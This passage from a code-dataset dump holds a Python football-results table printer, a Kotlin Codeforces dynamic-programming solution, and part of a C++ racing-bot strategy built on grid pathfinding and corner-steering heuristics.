match['result'] = {'detailed': {'goal1': 0, 'goal2': 0, 'extra': ''}}\n result = match['result']['detailed']\n goals1 = result['goal1']\n goals2 = result['goal2']\n if 'teams' not in match:\n team1 = match['name']\n team2 = ''\n else:\n team1 = match['teams'][0]['name']\n team2 = match['teams'][1]['name']\n time = match['time']\n status = match['status']\n our = boldTeam(team1, name) or boldTeam(team2, name)\n if status == 'окончен':\n if goals1 > goals2:\n team1 = setColor('green', team1)\n team2 = setColor('red', team2)\n elif goals2 > goals1:\n team1 = setColor('red', team1)\n team2 = setColor('green', team2)\n else:\n team1 = setColor('yellow', team1)\n team2 = setColor('yellow', team2)\n\n score = str(goals1) + ':' + str(goals2)\n if result['extra'] != '': score += ' (' + result['extra'].replace(' ', '') + ')'\n arr = [team1, team2, time, score, status['name']]\n if our:\n arr[3] = '> ' + arr[3] + ' <'\n arr = list(map(lambda x: colors['BOLD'] + x, arr))\n arr[4] += colors['ENDC']\n table.append(arr)\n\n table = terminaltables.AsciiTable(table, title=temp['name'])\n # table = terminaltables.SingleTable(table, title=temp['name'])\n table.inner_heading_row_border = False\n for i in range(5):\n table.justify_columns[i] = 'center'\n print(table.table)\n\nfor (name, nameKey) in datas:\n if nameKey not in actions:\n continue\n print('\\n>>>>> ' + name)\n for tour in actions[nameKey]['tournaments'].values():\n found = False\n for name in names:\n if tour['name'].find(name) != -1 and tour['name'].find('АФК') == -1 and tour['name'].find('(ж)') == -1:\n printTour(tour, name)\n\n\n" }, { "alpha_fraction": 0.45073968172073364, "alphanum_fraction": 0.4856783151626587, "avg_line_length": 29.548076629638672, "blob_id": "6721bbcb70981e78dd82790c95728b1250af6cdb", "content_id": "1fcf1e1d575d319cd48279a858f7fade576b613e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3177, "license_type": "no_license", "max_line_length": 151, "num_lines": 104, "path": "/CodeForce/1571/E.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nconst val M = 1000000\n\nprivate fun run() {\n val (n) = readln()\n val s = readLine()!!.replace('(', '0').replace(')', '1')\n val a = readLine()!!\n val dp = Array(n) { IntArray(16) { M } }\n val states = listOf(\"0000\", \"0001\", \"0010\", \"0011\", \"0100\", \"0101\", \"0110\", \"0111\", \"1000\", \"1001\", \"1010\", \"1011\", \"1100\", \"1101\", \"1110\", \"1111\")\n val all = states.indices.toList()\n val restricted = listOf(3, 5)\n fun getDiff(s: String, t: String): Int {\n var c = 0\n for (i in s.indices)\n if (s[i] != t[i])\n ++c\n return c\n }\n for (j in states.indices) {\n val state = states[j].substring(1, 4)\n dp[0][j] = getDiff(state, s.substring(0, 3))\n }\n for (i in a.indices) {\n var curStates = all\n if (a[i] == '1')\n curStates = restricted\n for (j in all)\n if (dp[i][j] != M) {\n val prevState = states[j].substring(1, 4)\n for (k in curStates) {\n val curState = states[k]\n if (getDiff(prevState, curState) == 0) {\n dp[i + 1][k] = min(dp[i + 1][k], dp[i][j] + ok(s[i + 3] != curState[3]))\n }\n }\n }\n }\n var ans = M\n for (i in all)\n ans = min(ans, dp[n - 3][i])\n if (ans == M)\n writeln(-1)\n else\n writeln(ans)\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n val (t) = readln()\n repeat(t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n @OptIn(kotlin.ExperimentalStdlibApi::class)\n val d = c.code - '0'.code\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.42286843061447144, "alphanum_fraction": 0.44843825697898865, "avg_line_length": 41.62215805053711, "blob_id": "1ffbe8fe3d9335ec46237f0a0a67a7e2a3c6bd82", "content_id": "261d9694ca60a3123255c2ca6bfa76427461391a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 45115, "license_type": "no_license", "max_line_length": 492, "num_lines": 1056, "path": "/trains/ai/cpp-cgdk/MyStrategy.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n\n\n\n\n//Не читайте этот код, у Вас вытекут глаза :(\n\n\n\n\n\n//Объезжалочка\n//Я умею говнокодить 2\n//Это гениально и просто..... Зачем я писал столько кода\n#include \"MyStrategy.h\"\n\n#define PI 3.14159265358979323846\n#define _USE_MATH_DEFINES\n#define go(p, a, b) { if (p) goto a; else goto b; }\n\n#include <bits/stdc++.h>\n//#ifdef ONLINE_JUDGE\n//#define debug 1\n//#endif\n#ifdef debug\n//#undef debug\n//#endif\n#include \"library.h\"\n#endif\n\n#ifdef vis\n#include \"Debug.h\"\nDebug visual;\n#endif\nusing namespace model;\nusing namespace std;\n\ndouble DIST_TO_NEXT = 750;\nint COUNT_OF_FAILS = 60;\nint FORCE_BACK = 120;\nint FORCE_RIGHT = 60;\nint FORCE = 100;\nint BREAK = 30;\ndouble MAX_SPEED = 16;\nint FORCE_SLOW_DOWN = 1;\nint GLOBAL_FAIL = 2;\ndouble ANGLE_THROW = PI / 30;\nint PLANB = 123456;\ndouble tileSize = 0.0;\nint dir[15][4];\ndouble eps = 5;\n\nvector<double> power = { 1, 1};\nvector< bool > changed = { false, false};\nvector<double> distToNext = {-10000,-10000};\nvector<double> prevDistance = { 0, 0};\nvector< int > countOfFails = { 0, 0};\nvector< int > forceBack = { 0, 0};\nvector< int > forceRight = { 0, 0};\nvector< int > force = { 0, 0};\nvector< int > prevx = { 0, 0};\nvector< int > currx = {-1234, -1234};\nvector< int > forceSlow = { 0, 0};\nvector< int > globalFail = { 0, 0};\nvector< int > beforeTick = { 555, 190};\nvector<double> turn = { 0.0, 0.0};\nvector< bool > init = { true, true};\nvector< bool > snake = { false, false};\nvector< bool > drift = { false, false};\nvector<double> width = { 0, 0};\nvector<double> height = { 0, 0};\nvector< int > d = { 0, 0};\nvector< int > pd = { 0, 0};\nvector< int > planB = { 0, 0};\nvector<double> tickTargetX = { 0.0, 0.0};\nvector<double> tickTargetY = { 0.0, 0.0};\nvector< int > tickTarget = { 0, 0};\nvector< int > tickTargetI = {-1, -1};\nvector< int > tickTargetJ = {-1, -1};\n\nvector<set<pair<int,int>>> bad;\nvector<vector<pair<int,int>>> old;\nvector<vector<vector<bool>>> once;\n\n#define power power[ct]\n#define changed changed[ct]\n#define distToNext distToNext[ct]\n#define prevDistance prevDistance[ct]\n#define countOfFails countOfFails[ct]\n#define forceBack forceBack[ct]\n#define forceRight forceRight[ct]\n#define force force[ct]\n#define prevx prevx[ct]\n#define currx currx[ct]\n#define forceSlow forceSlow[ct]\n#define globalFail globalFail[ct]\n#define beforeTick beforeTick[ct]\n#define turn turn[ct]\n#define init init[ct]\n#define snake snake[ct]\n#define drift drift[ct]\n#define width width[ct]\n#define height height[ct]\n#define d d[ct]\n#define pd pd[ct]\n#define planB planB[ct]\n#define bad bad[ct]\n#define old old[ct]\n#define once once[ct]\n#define tickTarget tickTarget[ct]\n#define tickTargetX tickTargetX[ct]\n#define tickTargetY tickTargetY[ct]\n#define tickTargetI tickTargetI[ct]\n#define tickTargetJ tickTargetJ[ct]\n\n#define RIGHT 0\n#define UP 1\n#define LEFT 2\n#define DOWN 3\n\nvector<int> ddx = {1, 0, -1, 0};\nvector<int> ddy = {0, -1, 0, 1};\nmap<pair<int, int>, int> directions;\n\nvector<vector<vector<int>>> goforward = { { { RIGHT, UP, DOWN, LEFT }, { RIGHT, UP, LEFT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, { { UP, RIGHT, DOWN, LEFT }, { UP, LEFT, RIGHT, DOWN }, { UP, LEFT, DOWN, RIGHT }, { DOWN, LEFT, RIGHT, UP } }, { { RIGHT, UP, DOWN, LEFT }, { LEFT, UP, RIGHT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, { { DOWN, RIGHT, UP, LEFT }, { UP, RIGHT, LEFT, DOWN }, { DOWN, LEFT, UP, RIGHT }, { DOWN, RIGHT, LEFT, UP } } };\n\nvector<vector<vector<int>>> FUUUUU = { { { UP, DOWN, RIGHT, LEFT }, { RIGHT, UP, LEFT, DOWN }, { UP, DOWN, LEFT, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, { { UP, RIGHT, DOWN, LEFT }, { LEFT, RIGHT, UP, DOWN }, { UP, LEFT, DOWN, RIGHT }, { LEFT, RIGHT, DOWN, UP } }, { { UP, DOWN, RIGHT, LEFT }, { LEFT, UP, RIGHT, DOWN }, { UP, DOWN, LEFT, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, { { DOWN, RIGHT, UP, LEFT }, { RIGHT, LEFT, UP, DOWN }, { DOWN, LEFT, UP, RIGHT }, { RIGHT, LEFT, DOWN, UP } } }, FU;\n\nint opposite(int x, int y) { return abs(x - y) == 2; }\n\nstruct vertex\n{\n int x, y, qd, qpd, hasBonus;\n vertex(){}\n vertex(int x, int y, int pdd, int ddd, int hb) : x(x), y(y), qd(ddd), qpd(pdd), hasBonus(hb) {}\n};\n\ntemplate <typename T>\nvoid ppp(vector<vector<T>> a)\n{\n int n = a.size();\n int m = a[0].size();\n for (int j = 0; j < m; ++j)\n for (int i = 0; i < n; ++i)\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\n printf(\"\\n\");\n}\n\nbool isCorner(TileType a) { return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS); }\n\ndouble getCenter(double xxx) { return (xxx + 0.5) * tileSize; }\n\ndouble get(double xxx) { return xxx * tileSize; }\n\ndouble get34(double xxx) { return (xxx + 0.9) * tileSize; }\n\ndouble get14(double xxx) { return (xxx + 0.1) * tileSize; }\n\nbool isVertical(pair<int, int> a, pair<int, int> b) { return a.first == b.first; }\n\nbool isHorizontal(pair<int, int> a, pair<int, int> b) { return a.second == b.second; }\n\nbool is32(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4]) &&\n !isVertical(a[1], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]) &&\n !isHorizontal(a[1], a[4])); else\n return false;\n}\n\nbool is3_2(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isVertical(a[1], a[4]) &&\n isHorizontal(a[3], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isHorizontal(a[1], a[4]) &&\n isVertical(a[3], a[4])); else\n return false;\n}\n\nbool is212(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]) &&\n isHorizontal(a[1], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4]) &&\n isVertical(a[1], a[4])); else\n return false;\n}\n\nbool is41(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4])); else\n return false;\n}\n\nbool is4(vector<pair<int, int>>& a)\n{\n if (a.size() >= 4)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3])); else\n return false;\n}\n\nbool is131(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isVertical(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]))\n || ( isHorizontal(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4])); else\n return false;\n}\n\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b) {\n if (isVertical(a, b))\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\n else\n return make_pair(get(max(a.first, b.first)), getCenter(a.second)); }\n\ndouble get(double x, double v) { return (x + v) * tileSize; }\n\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b, pair<int, int>& c)\n{\n double xxx = 0.35;\n if (isVertical(a, b))\n return make_pair(get(max(b.first, c.first)), get(b.second, a.second < b.second ? xxx : 1 - xxx));\n else\n return make_pair(get(b.first, a.first < b.first ? xxx : 1 - xxx), get(max(b.second, c.second)));\n}\n\nint opposite(int x) { switch (x) { case LEFT: case RIGHT: return 2 - x; default: return 4 - x; } }\n\nbool isRightTo(pair<int, int> a, pair<int, int> b) { return a.first - 1 == b.first && a.second == b.second; }\n\nbool isLeftTo(pair<int, int> a, pair<int, int> b) { return a.first + 1 == b.first && a.second == b.second; }\n\nbool isUpTo(pair<int, int> a, pair<int, int> b) { return a.first == b.first && a.second + 1 == b.second; }\n\nbool isDownTo(pair<int, int> a, pair<int, int> b) { return a.first == b.first && a.second - 1 == b.second; }\n\nint getDirectionByAngle(double angle)\n{\n double sasdfasdf = PI / 9;\n if (fabs(angle) < sasdfasdf)\n return RIGHT;\n if (fabs(angle - PI / 2) < sasdfasdf)\n return DOWN;\n if (fabs(angle + PI / 2) < sasdfasdf)\n return UP;\n if (fabs(angle - PI) < sasdfasdf)\n return LEFT;\n if (fabs(angle + PI) < sasdfasdf)\n return LEFT;\n return -1;\n}\n\npair<int, int> getNextTurn(vector<pair<int, int>> path, int index = 0)\n{\n for (int i = index + 1; i < int(path.size()) - 1; ++i)\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == path[i + 1])\n return path[i];\n return path.back();\n}\n\npair<int, int> reflect(pair<int, int> a, pair<int, int> b)\n{\n return isHorizontal(a, b) ? make_pair(a.first < b.first ? b.first + 1 : b.first - 1, b.second) : make_pair(b.first, a.second < b.second ? b.second + 1 : b.second - 1);\n}\n\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\n CarType ct = self.getType();\n bool badMap = true;//world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\";\n cout << (self.getType() == BUGGY ? \"BUGGY\\n\" : \"JEEP\\n\");\n cout.flush();\n {\n tileSize = game.getTrackTileSize();\n auto a = world.getTilesXY();\n for (int i = 0; i < a.size(); ++i)\n for (int j = 0; j < a[0].size(); ++j)\n if (a[i][j] == UNKNOWN)\n a[i][j] = CROSSROADS;\n if (init)\n {\n FU = goforward;\n\n if (world.getMapName() == \"map07\")// || world.getMapName() == \"map08\")// || world.getMapName() == \"map14\")\n FUUUUU = goforward;\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\n\n init = false;\n width = self.getWidth() / 2;\n height = self.getHeight() / 2;\n once.resize(a.size());\n for (int i = 0; i < once.size(); ++i)\n once[i].resize(a[0].size(), false);\n d = getDirectionByAngle(self.getAngle());\n pd = d;\n srand(game.getRandomSeed());\n }\n int waypointIndex = self.getNextWaypointIndex();\n int qx = self.getX() / tileSize;\n int qy = self.getY() / tileSize;\n int wx, wy;\n tie(wx, wy) = old.back();\n if ((wx != qx || wy != qy) && forceBack == 0)\n {\n old[0] = {qx, qy};\n pd = d;\n d = directions[make_pair(qx - wx, qy - wy)];\n //if (forceBack)\n //d = opposite(d);\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\n FU = FUUUUU;\n }\n prevx = currx;\n if (prevx == -1234)\n prevx = self.getX();\n currx = self.getX();\n if (currx - prevx != 0)\n changed = true;\n int ti = self.getNextWaypointX();\n int tj = self.getNextWaypointY();\n auto wp = world.getWaypoints();\n for (int i = 0; i < min(3, int(wp.size())); ++i)\n wp.push_back(wp[i]);\n int fi, fj, pi, pj;\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\n double targetX = getCenter(ti);\n double targetY = getCenter(tj);\n int si = self.getX() / tileSize;\n int sj = self.getY() / tileSize;\n pair<int, int> S = make_pair(si, sj);\n vector<int> qwerqsdfgsdf = {si, sj};\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\n once[si][sj] = true;\n if (bad.find(S) == bad.end())\n bad.clear();\n int n = a.size();\n int m = a[0].size();\n auto ok = [&](int x, int N)\n {\n return x >= 0 && x < N;\n };\n\n auto getPath = [&](int si, int sj, int tti, int ttj, int pdd, int dd, vector<vector<vector<int>>> FUUUUU, int countBonuses = 1)\n {\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\n {\n vector<pair<int, int>> path;\n while (u != si || v != sj)\n path.push_back({u, v}),\n tie(u, v) = prev[u][v];\n path.push_back({si, sj});\n reverse(path.begin(), path.end());\n return path;\n };\n auto bfs = [&](int si, int sj, int tti, int ttj, int pdd, int dd, vector<vector<vector<int>>> FUUUUUF)\n {\n queue<vertex> q;\n q.push(vertex(si, sj, pdd, dd, 0));\n vector<vector<int>> dist(n, vector<int>(m, 10000));\n vector<vector<vector<int>>> FUUUUU;\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\n dist[si][sj] = 0;\n int u, v, prevD, prevprevD;\n while (q.size())\n {\n u = q.front().x;\n v = q.front().y;\n prevD = q.front().qd;\n prevprevD = q.front().qpd;\n int hasBonus = 0;\n for (Bonus bonus : world.getBonuses())\n if ((bonus.getType() == PURE_SCORE || (bonus.getType() == REPAIR_KIT && self.getDurability() < 20)) && int(bonus.getX() / tileSize) == u && int(bonus.getY() / tileSize) == v\n && fabs(bonus.getX() - getCenter(bonus.getX() / tileSize) < 0.3 * tileSize)\n && fabs(bonus.getY() - getCenter(bonus.getY() / tileSize) < 0.3 * tileSize))\n hasBonus++;\n if (countBonuses == 0)\n hasBonus = 0;\n FUUUUU = hasBonus ? goforward : FUUUUUF;\n q.pop();\n if (a[u][v] == UNKNOWN)\n continue;\n vector<int> dx;\n vector<int> dy;\n for (int i = 0; i < 4; ++i)\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\n for (int i = 0; i < 4; ++i)\n {\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\n {\n int isReverse = opposite(prevD, iAmIdiot);\n int isShpilka = opposite(prevprevD, iAmIdiot);\n int temp = dist[u][v] + 1 + isShpilka * 3 + isReverse * 12 - hasBonus;\n if (dist[u + dx[i]][v + dy[i]] > temp)\n {\n dist[u + dx[i]][v + dy[i]] = temp;\n prev[u + dx[i]][v + dy[i]] = {u, v};\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot, hasBonus));\n }\n }\n }\n }\n return make_pair(d, prev);\n };\n auto qqwerwer = bfs(si, sj, tti, ttj, pdd, dd, FUUUUU);\n int u, v;\n u = tti;\n v = ttj;\n auto prev = qqwerwer.second;\n auto path = fffpath(si, sj, u, v, prev);\n return path;\n };\n vector<pair<int, int>> path;\n int qqq = ti;\n int www = tj;\n path = getPath(si, sj, ti, tj, pd, d, FU);\n tie(ti, tj) = getNextTurn(path);\n targetX = getCenter(ti);\n targetY = getCenter(tj);\n if (fabs(self.getAngleTo(targetX, targetY)) > PI / 3 && forceBack == 0 && forceRight == 0 && planB == 0)\n path = getPath(si, sj, qqq, www, pd, d, goforward, 0);\n\n for (int i = 0; i + 4 < min(8, int(path.size())); ++i)\n if (\n (\n isVertical(path[i + 0], path[i + 1]) &&\n isVertical(path[i + 2], path[i + 3]) &&\n isHorizontal(path[i + 0], path[i + 3]) &&\n isHorizontal(path[i + 1], path[i + 2])\n )\n ||\n (\n isHorizontal(path[i + 0], path[i + 1]) &&\n isHorizontal(path[i + 2], path[i + 3]) &&\n isVertical(path[i + 0], path[i + 3]) &&\n isVertical(path[i + 1], path[i + 2])\n )\n )\n {\n path = getPath(si, sj, qqq, www, pd, d, goforward);\n break;\n }\n int ai, aj, bi, bj, ci, cj, di, dj;\n while (waypointIndex + 1 < int(wp.size()))\n {\n int t = 0;\n int y = 0;\n auto zxcv = path.back();\n auto asdf = path.back();\n auto qwer = path.back();\n if (path.size() >= 2)\n asdf = path[path.size() - 2];\n if (path.size() >= 3)\n zxcv = path[path.size() - 3];\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\n if (path.size() < 3)\n t = d;\n int q = wp[waypointIndex][0];\n int w = wp[waypointIndex][1];\n int e = wp[waypointIndex + 1][0];\n int r = wp[waypointIndex + 1][1];\n auto temp = getPath(q, w, e, r, t, y, FU);\n if (temp.size() <= 1)\n break;\n for (auto x : temp)\n path.push_back(x);\n waypointIndex++;\n }\n for (int i = 1; i < int(path.size()); ++i)\n if (path[i] == path[i - 1])\n path.erase(path.begin() + --i);\n tie(ti, tj) = getNextTurn(path);\n targetX = getCenter(ti);\n targetY = getCenter(tj);\n for (int i = 0; i < int(path.size()); ++i)\n if (path[i].first == ti && path[i].second == tj)\n {\n pi = path[max(0, i - 1)].first;\n pj = path[max(0, i - 1)].second;\n fi = path[min(int(path.size()) - 1, i + 1)].first;\n fj = path[min(int(path.size()) - 1, i + 1)].second;\n break;\n }\n double randomName = 1;\n if (path.size() >= 3)\n {\n tie(ai, aj) = path[0];\n tie(bi, bj) = path[1];\n tie(ci, cj) = path[2];\n }\n if (path.size() >= 4)\n {\n tie(di, dj) = path[3];\n snake = true;\n if (path[0] == path[2]);\n else\n if (bad.find(S) == bad.end() && (\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\n ))\n {\n tie(targetX, targetY) = getXX(path[1], path[2]);\n int ri, rj;\n tie(ri, rj) = getNextTurn(path, 2); \n if (abs(ci - ri) + abs(cj - rj) >= 2)\n {\n ////tie(targetX, targetY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\n tie(tickTargetX, tickTargetY) = getXX(path[2], path[3]);\n tickTargetI = bi;\n tickTargetJ = bj;\n ////tie(pi, pj) = path[1];\n ////tie(ti, tj) = path[2];\n ////tie(fi, fj) = path[3];\n ////targetX = getCenter(ti);\n ////targetY = getCenter(tj);\n ////randomName = 1;\n ////snake = false;\n }\n }\n else\n {\n drift = true;\n snake = false;\n if (\n (\n isVertical(path[0], path[1]) &&\n isVertical(path[2], path[3]) &&\n isHorizontal(path[0], path[3]) &&\n isHorizontal(path[1], path[2])\n )\n ||\n (\n isHorizontal(path[0], path[1]) &&\n isHorizontal(path[2], path[3]) &&\n isVertical(path[0], path[3]) &&\n isVertical(path[1], path[2])\n )\n )\n {\n bool is33 = d == directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)];\n bad.insert(path[1]);\n\n if (!is33)\n bad.insert(path[0]),\n bad.insert(path[2]),\n tie(targetX, targetY) = getCorner(path[0], path[1], path[2]);\n else\n //tie(pi, pj) = reflect(path[0], path[1]),\n //tie(fi, fj) = path[2],\n //a[ti][tj] = CROSSROADS,\n drift = false;\n }\n else\n drift = false;\n }\n } else\n drift = false,\n snake = false;\n if (si == tickTargetI && sj == tickTargetJ)\n {\n if (tickTarget == -1)\n tickTarget = world.getTick() + 25 - speedModule + badMap * 20;\n }\n else\n tickTarget = -1,\n tickTargetI = -1,\n tickTargetJ = -1,\n tickTargetX = -1,\n tickTargetY = -1;\n if (world.getTick() < tickTarget)\n targetX = tickTargetX,\n targetY = tickTargetY,\n snake = true;\n double temp = self.getDistanceTo(targetX, targetY);\n double temp2 = temp / tileSize / randomName;\n prevDistance = distToNext;\n distToNext = temp;\n auto interpolation = [&](double x)\n {\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2;\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1) + 0.2;\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279;\n };\n double MAAAAAGIC = interpolation(temp2);\n if (temp2 > 2)\n MAAAAAGIC = -0.25;\n if (temp2 < 0.6)\n MAAAAAGIC = interpolation(0.6);\n\n double nextWaypointX = targetX;\n double nextWaypointY = targetY;\n\n double cornerTileOffset = MAAAAAGIC * tileSize;\n auto changeCoords = [&](int i, int j) {\n if (snake || drift)\n return;\n if (pj == tj)\n swap(pi, fi),\n swap(pj, fj);\n switch (a[i][j])\n {\n case LEFT_TOP_CORNER:\n lt:\n\n nextWaypointX += cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case RIGHT_TOP_CORNER:\n rt:\n\n nextWaypointX -= cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case LEFT_BOTTOM_CORNER:\n lb:\n\n nextWaypointX += cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case RIGHT_BOTTOM_CORNER:\n rb:\n\n nextWaypointX -= cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case TOP_HEADED_T:\n th:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rb, lb);\n break;\n case BOTTOM_HEADED_T:\n bh:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rt, lt);\n break;\n case RIGHT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, lb, lt);\n break;\n case LEFT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, rb, rt);\n break;\n case CROSSROADS:\n if (pi == ti && pi == fi);\n else if (pj == tj && pj == fj);\n else go(pj + 1 == tj, th, bh);\n default:\n break;\n }\n };\n changeCoords(ti, tj);\n bool B = false;\n double bonusMin = 1000000;\n Bonus bonus;\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\n for (Bonus b : world.getBonuses())\n if (self.getDistanceTo(b) < distToNext)\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && (fabs(self.getAngleTo(b)) < PI / 27 && fabs(self.getAngleTo(targetX, targetY) < PI / 36) || (bonus.getType() == PURE_SCORE || (bonus.getType() == REPAIR_KIT && self.getDurability() < 20)) && self.getAngleTo(b) < PI / 5) && self.getDistanceTo(b) > tileSize * 0.75))\n {\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\n pair<int, int> qwerty = {ti, tj};\n for (auto point : path)\n {\n if (point == qwerty)\n break;\n if (point == bbb)\n {\n B = true;\n if (bonusMin > self.getDistanceTo(b))\n bonus = b,\n bonusMin = self.getDistanceTo(b);\n }\n }\n }\n if (B)\n {\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\n nextWaypointX = bonus.getX();\n nextWaypointY = bonus.getY();\n nextWaypointX = min(nextWaypointX, get(bbb.first + 